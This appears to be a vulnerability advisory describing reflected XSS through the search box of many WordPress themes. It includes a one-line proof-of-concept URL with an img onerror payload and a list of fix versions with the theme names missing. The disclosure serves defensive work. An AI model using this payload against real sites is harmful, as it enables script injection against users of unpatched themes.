Multiple Themes - Reflected XSS

Description

The themes all suffer from the same issue: the search box reflects the search results, causing reflected XSS. This allows an unauthenticated attacker to exploit users who click a malicious link.

Proof of Concept

https://example.com/?s=katana<IMG """><IMG SRC=/ onerror="alert(1)"></img>/asd/

Affects Themes

No known fix
No known fix
No known fix
Fixed in 1.1.13
No known fix
Fixed in 1.8.6
No known fix
Fixed in 2.1
Fixed in 1.1.4
Fixed in 1.5.1
No known fix
No known fix
Fixed in 3.0.2
Fixed in 1.22
Fixed in 1.2.4
No known fix
Fixed in 1.2.1
Fixed in 1.4.2
No known fix
No known fix
Fixed in 1.2.9
No known fix
No known fix
Fixed in 1.3.0
No known fix
Fixed in 1.2.4
No known fix
No known fix
No known fix
Fixed in 1.2.10
Fixed in 1.1.9
No known fix
No known fix
Fixed in 1.1.3
Fixed in 1.1.0
Fixed in 1.4.6
No known fix
No known fix
No known fix
No known fix
No known fix
No known fix
Fixed in 1.5.5
No known fix
Fixed in 1.3.2
Fixed in 1.0.2
Fixed in 1.2.7

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Submitter
Random Robbie
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2023-08-14 (about 9 months ago)
Added
2023-08-14 (about 8 months ago)
Last Updated
2023-08-31 (about 8 months ago)
